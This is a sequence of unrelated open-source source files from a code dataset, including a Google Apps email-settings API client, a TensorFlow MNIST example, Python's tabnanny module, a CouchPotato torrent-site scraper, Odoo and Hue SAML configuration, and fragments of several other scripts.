xnew, ynew, znew):
A = [xold, yold, zold]
B = [xnew, ynew, znew]
axis = [0.0, 0.0, 0.0]
CrossProd(axis, A, B)
La = Length(A)
Lb = Length(B)
Lc = Length(axis)
sinAng = Lc / (La * Lb)
cosAng = DotProd(A, B) / (La * Lb)
if Lc > 0.0:
Normalize(axis, axis)
angle = math.atan2(sinAng, cosAng)
else:
axis = [1.0, 0.0, 0.0]
angle = 0.0
RotMatAXYZ(dest, angle, axis[0], axis[1], axis[2])
| gpl-3.0 |
ehashman/oh-mainline | vendor/packages/gdata/src/gdata/apps/emailsettings/service.py | 95 | 8939 | #!/usr/bin/python
#
# Copyright (C) 2008 Google, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Allow Google Apps domain administrators to set users' email settings.
EmailSettingsService: Set various email settings.
"""
__author__ = 'google-apps-apis@googlegroups.com'
import gdata.apps
import gdata.apps.service
import gdata.service
API_VER='2.0'
# Forwarding and POP3 options
KEEP='KEEP'
ARCHIVE='ARCHIVE'
DELETE='DELETE'
ALL_MAIL='ALL_MAIL'
MAIL_FROM_NOW_ON='MAIL_FROM_NOW_ON'
class EmailSettingsService(gdata.apps.service.PropertyService):
"""Client for the Google Apps Email Settings service."""
def _serviceUrl(self, setting_id, username, domain=None):
if domain is None:
domain = self.domain
return '/a/feeds/emailsettings/%s/%s/%s/%s' % (API_VER, domain, username,
setting_id)
def CreateLabel(self, username, label):
"""Create a label.
Args:
username: User to create label for.
label: Label to create.
Returns:
A dict containing the result of the create operation.
"""
uri = self._serviceUrl('label', username)
properties = {'label': label}
return self._PostProperties(uri, properties)
def CreateFilter(self, username, from_=None, to=None, subject=None,
has_the_word=None, does_not_have_the_word=None,
has_attachment=None, label=None, should_mark_as_read=None,
should_archive=None):
"""Create a filter.
Args:
username: User to create filter for.
from_: Filter from string.
to: Filter to string.
subject: Filter subject.
has_the_word: Words to filter in.
does_not_have_the_word: Words to filter out.
has_attachment: Boolean for message having attachment.
label: Label to apply.
should_mark_as_read: Boolean for marking message as read.
should_archive: Boolean for archiving message.
Returns:
A dict containing the result of the create operation.
"""
uri = self._serviceUrl('filter', username)
properties = {}
properties['from'] = from_
properties['to'] = to
properties['subject'] = subject
properties['hasTheWord'] = has_the_word
properties['doesNotHaveTheWord'] = does_not_have_the_word
properties['hasAttachment'] = gdata.apps.service._bool2str(has_attachment)
properties['label'] = label
properties['shouldMarkAsRead'] = gdata.apps.service._bool2str(should_mark_as_read)
properties['shouldArchive'] = gdata.apps.service._bool2str(should_archive)
return self._PostProperties(uri, properties)
def CreateSendAsAlias(self, username, name, address, reply_to=None,
make_default=None):
"""Create alias to send mail as.
Args:
username: User to create alias for.
name: Name of alias.
address: Email address to send from.
reply_to: Email address to reply to.
make_default: Boolean for whether this is the new default sending alias.
Returns:
A dict containing the result of the create operation.
"""
uri = self._serviceUrl('sendas', username)
properties = {}
properties['name'] = name
properties['address'] = address
properties['replyTo'] = reply_to
properties['makeDefault'] = gdata.apps.service._bool2str(make_default)
return self._PostProperties(uri, properties)
def UpdateWebClipSettings(self, username, enable):
"""Update WebClip Settings
Args:
username: User to update forwarding for.
enable: Boolean whether to enable Web Clip.
Returns:
A dict containing the result of the update operation.
"""
uri = self._serviceUrl('webclip', username)
properties = {}
properties['enable'] = gdata.apps.service._bool2str(enable)
return self._PutProperties(uri, properties)
def UpdateForwarding(self, username, enable, forward_to=None, action=None):
"""Update forwarding settings.
Args:
username: User to update forwarding for.
enable: Boolean whether to enable this forwarding rule.
forward_to: Email address to forward to.
action: Action to take after forwarding.
Returns:
A dict containing the result of the update operation.
"""
uri = self._serviceUrl('forwarding', username)
properties = {}
properties['enable'] = gdata.apps.service._bool2str(enable)
if enable is True:
properties['forwardTo'] = forward_to
properties['action'] = action
return self._PutProperties(uri, properties)
def UpdatePop(self, username, enable, enable_for=None, action=None):
"""Update POP3 settings.
Args:
username: User to update POP3 settings for.
enable: Boolean whether to enable POP3.
enable_for: Which messages to make available via POP3.
action: Action to take after user retrieves email via POP3.
Returns:
A dict containing the result of the update operation.
"""
uri = self._serviceUrl('pop', username)
properties = {}
properties['enable'] = gdata.apps.service._bool2str(enable)
if enable is True:
properties['enableFor'] = enable_for
properties['action'] = action
return self._PutProperties(uri, properties)
def UpdateImap(self, username, enable):
"""Update IMAP settings.
Args:
username: User to update IMAP settings for.
enable: Boolean whether to enable IMAP.
Returns:
A dict containing the result of the update operation.
"""
uri = self._serviceUrl('imap', username)
properties = {'enable': gdata.apps.service._bool2str(enable)}
return self._PutProperties(uri, properties)
def UpdateVacation(self, username, enable, subject=None, message=None,
contacts_only=None):
"""Update vacation settings.
Args:
username: User to update vacation settings for.
enable: Boolean whether to enable vacation responses.
subject: Vacation message subject.
message: Vacation message body.
contacts_only: Boolean whether to send message only to contacts.
Returns:
A dict containing the result of the update operation.
"""
uri = self._serviceUrl('vacation', username)
properties = {}
properties['enable'] = gdata.apps.service._bool2str(enable)
if enable is True:
properties['subject'] = subject
properties['message'] = message
properties['contactsOnly'] = gdata.apps.service._bool2str(contacts_only)
return self._PutProperties(uri, properties)
def UpdateSignature(self, username, signature):
"""Update signature.
Args:
username: User to update signature for.
signature: Signature string.
Returns:
A dict containing the result of the update operation.
"""
uri = self._serviceUrl('signature', username)
properties = {'signature': signature}
return self._PutProperties(uri, properties)
def UpdateLanguage(self, username, language):
"""Update user interface language.
Args:
username: User to update language for.
language: Language code.
Returns:
A dict containing the result of the update operation.
"""
uri = self._serviceUrl('language', username)
properties = {'language': language}
return self._PutProperties(uri, properties)
def UpdateGeneral(self, username, page_size=None, shortcuts=None, arrows=None,
snippets=None, unicode=None):
"""Update general settings.
Args:
username: User to update general settings for.
page_size: Number of messages to show.
shortcuts: Boolean whether shortcuts are enabled.
arrows: Boolean whether arrows are enabled.
snippets: Boolean whether snippets are enabled.
unicode: Wheter unicode is enabled.
Returns:
A dict containing the result of the update operation.
"""
uri = self._serviceUrl('general', username)
properties = {}
if page_size != None:
properties['pageSize'] = str(page_size)
if shortcuts != None:
properties['shortcuts'] = gdata.apps.service._bool2str(shortcuts)
if arrows != None:
properties['arrows'] = gdata.apps.service._bool2str(arrows)
if snippets != None:
properties['snippets'] = gdata.apps.service._bool2str(snippets)
if unicode != None:
properties['unicode'] = gdata.apps.service._bool2str(unicode)
return self._PutProperties(uri, properties)
| agpl-3.0 |
HKUST-SING/tensorflow | tensorflow/examples/learn/mnist.py | 45 | 3999 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This showcases how simple it is to build image classification networks.
It follows description from this TensorFlow tutorial:
https://www.tensorflow.org/versions/master/tutorials/mnist/pros/index.html#deep-mnist-for-experts
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from sklearn import metrics
import tensorflow as tf
layers = tf.contrib.layers
learn = tf.contrib.learn
def max_pool_2x2(tensor_in):
return tf.nn.max_pool(
tensor_in, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
def conv_model(feature, target, mode):
"""2-layer convolution model."""
# Convert the target to a one-hot tensor of shape (batch_size, 10) and
# with a on-value of 1 for each one-hot vector of length 10.
target = tf.one_hot(tf.cast(target, tf.int32), 10, 1, 0)
# Reshape feature to 4d tensor with 2nd and 3rd dimensions being
# image width and height final dimension being the number of color channels.
feature = tf.reshape(feature, [-1, 28, 28, 1])
# First conv layer will compute 32 features for each 5x5 patch
with tf.variable_scope('conv_layer1'):
h_conv1 = layers.convolution2d(
feature, 32, kernel_size=[5, 5], activation_fn=tf.nn.relu)
h_pool1 = max_pool_2x2(h_conv1)
# Second conv layer will compute 64 features for each 5x5 patch.
with tf.variable_scope('conv_layer2'):
h_conv2 = layers.convolution2d(
h_pool1, 64, kernel_size=[5, 5], activation_fn=tf.nn.relu)
h_pool2 = max_pool_2x2(h_conv2)
# reshape tensor into a batch of vectors
h_pool2_flat = tf.reshape(h_pool2, [-1, 7 * 7 * 64])
# Densely connected layer with 1024 neurons.
h_fc1 = layers.dropout(
layers.fully_connected(
h_pool2_flat, 1024, activation_fn=tf.nn.relu),
keep_prob=0.5,
is_training=mode == tf.contrib.learn.ModeKeys.TRAIN)
# Compute logits (1 per class) and compute loss.
logits = layers.fully_connected(h_fc1, 10, activation_fn=None)
loss = tf.losses.softmax_cross_entropy(target, logits)
# Create a tensor for training op.
train_op = layers.optimize_loss(
loss,
tf.contrib.framework.get_global_step(),
optimizer='SGD',
learning_rate=0.001)
return tf.argmax(logits, 1), loss, train_op
def main(unused_args):
### Download and load MNIST dataset.
mnist = learn.datasets.load_dataset('mnist')
### Linear classifier.
feature_columns = learn.infer_real_valued_columns_from_input(
mnist.train.images)
classifier = learn.LinearClassifier(
feature_columns=feature_columns, n_classes=10)
classifier.fit(mnist.train.images,
mnist.train.labels.astype(np.int32),
batch_size=100,
steps=1000)
score = metrics.accuracy_score(mnist.test.labels,
list(classifier.predict(mnist.test.images)))
print('Accuracy: {0:f}'.format(score))
### Convolutional network
classifier = learn.Estimator(model_fn=conv_model)
classifier.fit(mnist.train.images,
mnist.train.labels,
batch_size=100,
steps=20000)
score = metrics.accuracy_score(mnist.test.labels,
list(classifier.predict(mnist.test.images)))
print('Accuracy: {0:f}'.format(score))
if __name__ == '__main__':
tf.app.run()
| apache-2.0 |
shiblon/pytour | static/js/pypyjs/pypy-nojit.js-0.3.1/lib/modules/tabnanny.py | 394 | 11336 | #! /usr/bin/env python
"""The Tab Nanny despises ambiguous indentation. She knows no mercy.
tabnanny -- Detection of ambiguous indentation
For the time being this module is intended to be called as a script.
However it is possible to import it into an IDE and use the function
check() described below.
Warning: The API provided by this module is likely to change in future
releases; such changes may not be backward compatible.
"""
# Released to the public domain, by Tim Peters, 15 April 1998.
# XXX Note: this is now a standard library module.
# XXX The API needs to undergo changes however; the current code is too
# XXX script-like. This will be addressed later.
__version__ = "6"
import os
import sys
import getopt
import tokenize
if not hasattr(tokenize, 'NL'):
raise ValueError("tokenize.NL doesn't exist -- tokenize module too old")
__all__ = ["check", "NannyNag", "process_tokens"]
verbose = 0
filename_only = 0
def errprint(*args):
sep = ""
for arg in args:
sys.stderr.write(sep + str(arg))
sep = " "
sys.stderr.write("\n")
def main():
global verbose, filename_only
try:
opts, args = getopt.getopt(sys.argv[1:], "qv")
except getopt.error, msg:
errprint(msg)
return
for o, a in opts:
if o == '-q':
filename_only = filename_only + 1
if o == '-v':
verbose = verbose + 1
if not args:
errprint("Usage:", sys.argv[0], "[-v] file_or_directory ...")
return
for arg in args:
check(arg)
class NannyNag(Exception):
"""
Raised by tokeneater() if detecting an ambiguous indent.
Captured and handled in check().
"""
def __init__(self, lineno, msg, line):
self.lineno, self.msg, self.line = lineno, msg, line
def get_lineno(self):
return self.lineno
def get_msg(self):
return self.msg
def get_line(self):
return self.line
def check(file):
"""check(file_or_dir)
If file_or_dir is a directory and not a symbolic link, then recursively
descend the directory tree named by file_or_dir, checking all .py files
along the way. If file_or_dir is an ordinary Python source file, it is
checked for whitespace related problems. The diagnostic messages are
written to standard output using the print statement.
"""
if os.path.isdir(file) and not os.path.islink(file):
if verbose:
print "%r: listing directory" % (file,)
names = os.listdir(file)
for name in names:
fullname = os.path.join(file, name)
if (os.path.isdir(fullname) and
not os.path.islink(fullname) or
os.path.normcase(name[-3:]) == ".py"):
check(fullname)
return
try:
f = open(file)
except IOError, msg:
errprint("%r: I/O Error: %s" % (file, msg))
return
if verbose > 1:
print "checking %r ..." % file
try:
process_tokens(tokenize.generate_tokens(f.readline))
except tokenize.TokenError, msg:
errprint("%r: Token Error: %s" % (file, msg))
return
except IndentationError, msg:
errprint("%r: Indentation Error: %s" % (file, msg))
return
except NannyNag, nag:
badline = nag.get_lineno()
line = nag.get_line()
if verbose:
print "%r: *** Line %d: trouble in tab city! ***" % (file, badline)
print "offending line: %r" % (line,)
print nag.get_msg()
else:
if ' ' in file: file = '"' + file + '"'
if filename_only: print file
else: print file, badline, repr(line)
return
if verbose:
print "%r: Clean bill of health." % (file,)
class Whitespace:
# the characters used for space and tab
S, T = ' \t'
# members:
# raw
# the original string
# n
# the number of leading whitespace characters in raw
# nt
# the number of tabs in raw[:n]
# norm
# the normal form as a pair (count, trailing), where:
# count
# a tuple such that raw[:n] contains count[i]
# instances of S * i + T
# trailing
# the number of trailing spaces in raw[:n]
# It's A Theorem that m.indent_level(t) ==
# n.indent_level(t) for all t >= 1 iff m.norm == n.norm.
# is_simple
# true iff raw[:n] is of the form (T*)(S*)
def __init__(self, ws):
self.raw = ws
S, T = Whitespace.S, Whitespace.T
count = []
b = n = nt = 0
for ch in self.raw:
if ch == S:
n = n + 1
b = b + 1
elif ch == T:
n = n + 1
nt = nt + 1
if b >= len(count):
count = count + [0] * (b - len(count) + 1)
count[b] = count[b] + 1
b = 0
else:
break
self.n = n
self.nt = nt
self.norm = tuple(count), b
self.is_simple = len(count) <= 1
# return length of longest contiguous run of spaces (whether or not
# preceding a tab)
def longest_run_of_spaces(self):
count, trailing = self.norm
return max(len(count)-1, trailing)
def indent_level(self, tabsize):
# count, il = self.norm
# for i in range(len(count)):
# if count[i]:
# il = il + (i/tabsize + 1)*tabsize * count[i]
# return il
# quicker:
# il = trailing + sum (i/ts + 1)*ts*count[i] =
# trailing + ts * sum (i/ts + 1)*count[i] =
# trailing + ts * sum i/ts*count[i] + count[i] =
# trailing + ts * [(sum i/ts*count[i]) + (sum count[i])] =
# trailing + ts * [(sum i/ts*count[i]) + num_tabs]
# and note that i/ts*count[i] is 0 when i < ts
count, trailing = self.norm
il = 0
for i in range(tabsize, len(count)):
il = il + i/tabsize * count[i]
return trailing + tabsize * (il + self.nt)
# return true iff self.indent_level(t) == other.indent_level(t)
# for all t >= 1
def equal(self, other):
return self.norm == other.norm
# return a list of tuples (ts, i1, i2) such that
# i1 == self.indent_level(ts) != other.indent_level(ts) == i2.
# Intended to be used after not self.equal(other) is known, in which
# case it will return at least one witnessing tab size.
def not_equal_witness(self, other):
n = max(self.longest_run_of_spaces(),
other.longest_run_of_spaces()) + 1
a = []
for ts in range(1, n+1):
if self.indent_level(ts) != other.indent_level(ts):
a.append( (ts,
self.indent_level(ts),
other.indent_level(ts)) )
return a
# Return True iff self.indent_level(t) < other.indent_level(t)
# for all t >= 1.
# The algorithm is due to Vincent Broman.
# Easy to prove it's correct.
# XXXpost that.
# Trivial to prove n is sharp (consider T vs ST).
# Unknown whether there's a faster general way. I suspected so at
# first, but no longer.
# For the special (but common!) case where M and N are both of the
# form (T*)(S*), M.less(N) iff M.len() < N.len() and
# M.num_tabs() <= N.num_tabs(). Proof is easy but kinda long-winded.
# XXXwrite that up.
# Note that M is of the form (T*)(S*) iff len(M.norm[0]) <= 1.
def less(self, other):
if self.n >= other.n:
return False
if self.is_simple and other.is_simple:
return self.nt <= other.nt
n = max(self.longest_run_of_spaces(),
other.longest_run_of_spaces()) + 1
# the self.n >= other.n test already did it for ts=1
for ts in range(2, n+1):
if self.indent_level(ts) >= other.indent_level(ts):
return False
return True
# return a list of tuples (ts, i1, i2) such that
# i1 == self.indent_level(ts) >= other.indent_level(ts) == i2.
# Intended to be used after not self.less(other) is known, in which
# case it will return at least one witnessing tab size.
def not_less_witness(self, other):
n = max(self.longest_run_of_spaces(),
other.longest_run_of_spaces()) + 1
a = []
for ts in range(1, n+1):
if self.indent_level(ts) >= other.indent_level(ts):
a.append( (ts,
self.indent_level(ts),
other.indent_level(ts)) )
return a
def format_witnesses(w):
firsts = map(lambda tup: str(tup[0]), w)
prefix = "at tab size"
if len(w) > 1:
prefix = prefix + "s"
return prefix + " " + ', '.join(firsts)
def process_tokens(tokens):
INDENT = tokenize.INDENT
DEDENT = tokenize.DEDENT
NEWLINE = tokenize.NEWLINE
JUNK = tokenize.COMMENT, tokenize.NL
indents = [Whitespace("")]
check_equal = 0
for (type, token, start, end, line) in tokens:
if type == NEWLINE:
# a program statement, or ENDMARKER, will eventually follow,
# after some (possibly empty) run of tokens of the form
# (NL | COMMENT)* (INDENT | DEDENT+)?
# If an INDENT appears, setting check_equal is wrong, and will
# be undone when we see the INDENT.
check_equal = 1
elif type == INDENT:
check_equal = 0
thisguy = Whitespace(token)
if not indents[-1].less(thisguy):
witness = indents[-1].not_less_witness(thisguy)
msg = "indent not greater e.g. " + format_witnesses(witness)
raise NannyNag(start[0], msg, line)
indents.append(thisguy)
elif type == DEDENT:
# there's nothing we need to check here! what's important is
# that when the run of DEDENTs ends, the indentation of the
# program statement (or ENDMARKER) that triggered the run is
# equal to what's left at the top of the indents stack
# Ouch! This assert triggers if the last line of the source
# is indented *and* lacks a newline -- then DEDENTs pop out
# of thin air.
# assert check_equal # else no earlier NEWLINE, or an earlier INDENT
check_equal = 1
del indents[-1]
elif check_equal and type not in JUNK:
# this is the first "real token" following a NEWLINE, so it
# must be the first token of the next program statement, or an
# ENDMARKER; the "line" argument exposes the leading whitespace
# for this statement; in the case of ENDMARKER, line is an empty
# string, so will properly match the empty string with which the
# "indents" stack was seeded
check_equal = 0
thisguy = Whitespace(line)
if not indents[-1].equal(thisguy):
witness = indents[-1].not_equal_witness(thisguy)
msg = "indent not equal e.g. " + format_witnesses(witness)
raise NannyNag(start[0], msg, line)
if __name__ == '__main__':
main()
| apache-2.0 |
mvdbeek/tools-iuc | tools/gemini/test-data/util/shrink_simple_tab.py | 20 | 1807 | from __future__ import print_function
import argparse
from functools import partial
def keep_line(line, pos_cols, region):
fields = line.rstrip().split(b'\t')
if fields[pos_cols[0]] == region[0]: # same chromosome
if (
region[1] < int(fields[pos_cols[1]]) < region[2]
) or (
region[1] < int(fields[pos_cols[2]]) < region[2]
):
return True
def main(infile, ofile, num_header_lines):
print(infile, '->', ofile)
with open(infile, 'rb') as i:
with open(ofile, 'wb') as o:
# copy header lines
for c in range(num_header_lines):
o.write(next(i))
for line in i:
if keep_line(line):
o.write(line)
if __name__ == '__main__':
p = argparse.ArgumentParser()
p.add_argument('infile')
p.add_argument(
'-r', '--region',
required=True,
help='the region of the input file to rewrite'
)
p.add_argument(
'-o', '--ofile',
required=True,
help="the name of the output file"
)
p.add_argument(
'-c', '--cols',
nargs=3, type=int, required=True,
help="the columns of the input file specifying chrom, start and stop, "
"respectively"
)
p.add_argument(
'-n', '--num-header-lines',
type=int, default=0,
help='the number of header lines present in the input; These will '
'always be copied over to the new file.'
)
args = vars(p.parse_args())
chrom, reg = args['region'].split(':')
region = [chrom.encode()] + [int(x) for x in reg.split('-')]
keep_line = partial(keep_line, pos_cols=args['cols'], region=region)
main(args['infile'], args['ofile'], args['num_header_lines'])
| mit |
pselle/calibre | src/calibre/gui2/dbus_export/menu2.py | 14 | 2317 | #!/usr/bin/env python2
# vim:fileencoding=utf-8
from __future__ import (unicode_literals, division, absolute_import,
print_function)
__license__ = 'GPL v3'
__copyright__ = '2014, Kovid Goyal <kovid at kovidgoyal.net>'
# A implementation of the GMenuModel export of menus/actions on DBus.
# GMenuModel is pretty bad, does not support icons, for instance, so I have not
# bothered to complete it. See gtk.py for an exmaple app that creates a
# GMenuModel menu.
#
# Partial spec: https://wiki.gnome.org/Projects/GLib/GApplication/DBusAPI
import dbus
from PyQt5.Qt import QObject, pyqtSignal, QTimer, Qt
from calibre.utils.dbus_service import Object, method as dbus_method, signal as dbus_signal
from calibre.gui2.dbus_export.utils import set_X_window_properties
def add_window_properties_for_menu(widget, object_path, bus):
op = unicode(object_path)
set_X_window_properties(widget.effectiveWinId(), _UNITY_OBJECT_PATH=op, _GTK_UNIQUE_BUS_NAME=unicode(bus.get_unique_name()), _GTK_MENUBAR_OBJECT_PATH=op)
class DBusMenu(QObject):
handle_event_signal = pyqtSignal(object, object, object, object)
def __init__(self, object_path, parent=None, bus=None):
QObject.__init__(self, parent)
# Unity barfs is the Event DBUS method does not return immediately, so
# handle it asynchronously
self.handle_event_signal.connect(self.handle_event, type=Qt.QueuedConnection)
self.dbus_api = DBusMenuAPI(self, object_path, bus=bus)
self.set_status = self.dbus_api.set_status
self._next_id = 0
self.action_changed_timer = t = QTimer(self)
t.setInterval(0), t.setSingleShot(True), t.timeout.connect(self.actions_changed)
self.layout_changed_timer = t = QTimer(self)
t.setInterval(0), t.setSingleShot(True), t.timeout.connect(self.layouts_changed)
self.init_maps()
@property
def object_path(self):
return self.dbus_api._object_path
class DBusMenuAPI(Object):
ACTIONS_IFACE = 'org.gtk.Actions'
def __init__(self, menu, object_path, bus=None):
if bus is None:
bus = dbus.SessionBus()
Object.__init__(self, bus, object_path)
self.status = 'normal'
self.menu = menu
self.revision = 0
dbus_method, dbus_signal
| gpl-3.0 |
lmyrefelt/CouchPotatoServer | couchpotato/core/providers/torrent/iptorrents/main.py | 9 | 4032 | from bs4 import BeautifulSoup
from couchpotato.core.helpers.encoding import tryUrlencode
from couchpotato.core.helpers.variable import tryInt
from couchpotato.core.logger import CPLog
from couchpotato.core.providers.torrent.base import TorrentProvider
import traceback
log = CPLog(__name__)
class IPTorrents(TorrentProvider):
urls = {
'test' : 'http://www.iptorrents.com/',
'base_url' : 'http://www.iptorrents.com',
'login' : 'http://www.iptorrents.com/torrents/',
'login_check': 'http://www.iptorrents.com/inbox.php',
'search' : 'http://www.iptorrents.com/torrents/?l%d=1%s&q=%s&qf=ti&p=%d',
}
cat_ids = [
([48], ['720p', '1080p', 'bd50']),
([72], ['cam', 'ts', 'tc', 'r5', 'scr']),
([7], ['dvdrip', 'brrip']),
([6], ['dvdr']),
]
http_time_between_calls = 1 #seconds
cat_backup_id = None
def _searchOnTitle(self, title, movie, quality, results):
freeleech = '' if not self.conf('freeleech') else '&free=on'
pages = 1
current_page = 1
while current_page <= pages and not self.shuttingDown():
url = self.urls['search'] % (self.getCatId(quality['identifier'])[0], freeleech, tryUrlencode('%s %s' % (title.replace(':', ''), movie['library']['year'])), current_page)
data = self.getHTMLData(url, opener = self.login_opener)
if data:
html = BeautifulSoup(data)
try:
page_nav = html.find('span', attrs = {'class' : 'page_nav'})
if page_nav:
next_link = page_nav.find("a", text = "Next")
if next_link:
final_page_link = next_link.previous_sibling.previous_sibling
pages = int(final_page_link.string)
result_table = html.find('table', attrs = {'class' : 'torrents'})
if not result_table or 'nothing found!' in data.lower():
return
entries = result_table.find_all('tr')
for result in entries[1:]:
torrent = result.find_all('td')
if len(torrent) <= 1:
break
torrent = torrent[1].find('a')
torrent_id = torrent['href'].replace('/details.php?id=', '')
torrent_name = torrent.string
torrent_download_url = self.urls['base_url'] + (result.find_all('td')[3].find('a'))['href'].replace(' ', '.')
torrent_details_url = self.urls['base_url'] + torrent['href']
torrent_size = self.parseSize(result.find_all('td')[5].string)
torrent_seeders = tryInt(result.find('td', attrs = {'class' : 'ac t_seeders'}).string)
torrent_leechers = tryInt(result.find('td', attrs = {'class' : 'ac t_leechers'}).string)
results.append({
'id': torrent_id,
'name': torrent_name,
'url': torrent_download_url,
'detail_url': torrent_details_url,
'size': torrent_size,
'seeders': torrent_seeders,
'leechers': torrent_leechers,
})
except:
log.error('Failed to parsing %s: %s', (self.getName(), traceback.format_exc()))
break
current_page += 1
def getLoginParams(self):
return tryUrlencode({
'username': self.conf('username'),
'password': self.conf('password'),
'login': 'submit',
})
def loginSuccess(self, output):
return 'don\'t have an account' not in output.lower()
def loginCheckSuccess(self, output):
return '/logout.php' in output.lower()
| gpl-3.0 |
miipl-naveen/optibizz | addons/account_check_writing/__openerp__.py | 313 | 1808 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Check Writing',
'version': '1.1',
'author': 'OpenERP SA, NovaPoint Group',
'category': 'Generic Modules/Accounting',
'description': """
Module for the Check Writing and Check Printing.
================================================
""",
'website': 'https://www.odoo.com/page/accounting',
'depends' : ['account_voucher'],
'data': [
'wizard/account_check_batch_printing_view.xml',
'account_view.xml',
'account_voucher_view.xml',
'account_check_writing_data.xml',
'data/report_paperformat.xml',
'views/report_check.xml',
'account_check_writing_report.xml',
],
'demo': ['account_demo.xml'],
'test': [],
'installable': True,
'active': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
hdinsight/hue | desktop/libs/libsaml/src/libsaml/conf.py | 25 | 4857 | #!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import subprocess
from django.utils.translation import ugettext_lazy as _t, ugettext as _
from desktop.lib.conf import Config, coerce_bool, coerce_csv
BASEDIR = os.path.dirname(os.path.abspath(__file__))
USERNAME_SOURCES = ('attributes', 'nameid')
def xmlsec():
"""
xmlsec path
"""
try:
proc = subprocess.Popen(['which', 'xmlsec1'], stdout=subprocess.PIPE)
return proc.stdout.read().strip()
except subprocess.CalledProcessError:
return '/usr/local/bin/xmlsec1'
def dict_list_map(value):
if isinstance(value, str):
d = {}
for k, v in json.loads(value).iteritems():
d[k] = (v,)
return d
elif isinstance(value, dict):
return value
return None
XMLSEC_BINARY = Config(
key="xmlsec_binary",
dynamic_default=xmlsec,
type=str,
help=_t("Xmlsec1 binary path. This program should be executable by the user running Hue."))
ENTITY_ID = Config(
key="entity_id",
default="<base_url>/saml2/metadata/",
type=str,
help=_t("Entity ID for Hue acting as service provider. Can also accept a pattern where '<base_url>' will be replaced with server URL base."))
CREATE_USERS_ON_LOGIN = Config(
key="create_users_on_login",
default=True,
type=coerce_bool,
help=_t("Create users from IdP on login."))
ATTRIBUTE_MAP_DIR = Config(
key="attribute_map_dir",
default=os.path.abspath( os.path.join(BASEDIR, '..', '..', 'attribute-maps') ),
type=str,
private=True,
help=_t("Attribute map directory contains files that map SAML attributes to pysaml2 attributes."))
ALLOW_UNSOLICITED = Config(
key="allow_unsolicited",
default=True,
type=coerce_bool,
private=True,
help=_t("Allow responses that are initiated by the IdP."))
REQUIRED_ATTRIBUTES = Config(
key="required_attributes",
default=['uid'],
type=coerce_csv,
help=_t("Required attributes to ask for from IdP."))
OPTIONAL_ATTRIBUTES = Config(
key="optional_attributes",
default=[],
type=coerce_csv,
help=_t("Optional attributes to ask for from IdP."))
METADATA_FILE = Config(
key="metadata_file",
default=os.path.abspath( os.path.join(BASEDIR, '..', '..', 'examples', 'idp.xml') ),
type=str,
help=_t("IdP metadata in the form of a file. This is generally an XML file containing metadata that the Identity Provider generates."))
KEY_FILE = Config(
key="key_file",
default="",
type=str,
help=_t("key_file is the name of a PEM formatted file that contains the private key of the Hue service. This is presently used both to encrypt/sign assertions and as client key in a HTTPS session."))
CERT_FILE = Config(
key="cert_file",
default="",
type=str,
help=_t("This is the public part of the service private/public key pair. cert_file must be a PEM formatted certificate chain file."))
USER_ATTRIBUTE_MAPPING = Config(
key="user_attribute_mapping",
default={'uid': ('username', )},
type=dict_list_map,
help=_t("A mapping from attributes in the response from the IdP to django user attributes."))
AUTHN_REQUESTS_SIGNED = Config(
key="authn_requests_signed",
default=False,
type=coerce_bool,
help=_t("Have Hue initiated authn requests be signed and provide a certificate."))
LOGOUT_REQUESTS_SIGNED = Config(
key="logout_requests_signed",
default=False,
type=coerce_bool,
help=_t("Have Hue initiated logout requests be signed and provide a certificate."))
USERNAME_SOURCE = Config(
key="username_source",
default="attributes",
type=str,
help=_t("Username can be sourced from 'attributes' or 'nameid'"))
LOGOUT_ENABLED = Config(
key="logout_enabled",
default=True,
type=coerce_bool,
help=_t("Performs the logout or not."))
NAME_ID_FORMAT = Config(
key="name_id_format",
default="urn:oasis:names:tc:SAML:2.0:nameid-format:persistent",
type=str,
help=_t("Request this NameID format from the server"))
def config_validator(user):
res = []
if USERNAME_SOURCE.get() not in USERNAME_SOURCES:
res.append(("libsaml.username_source", _("username_source not configured properly. SAML integration may not work.")))
return res
| apache-2.0 |
jeffreyliu3230/osf.io | scripts/migrate_piwik_base_nodes.py | 49 | 1670 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Update Piwik for nodes that were forked, registered or templated prior to
October 2014.
"""
import datetime
import logging
import sys
import time
from modularodm import Q
from framework.analytics.piwik import _update_node_object
from scripts import utils as scripts_utils
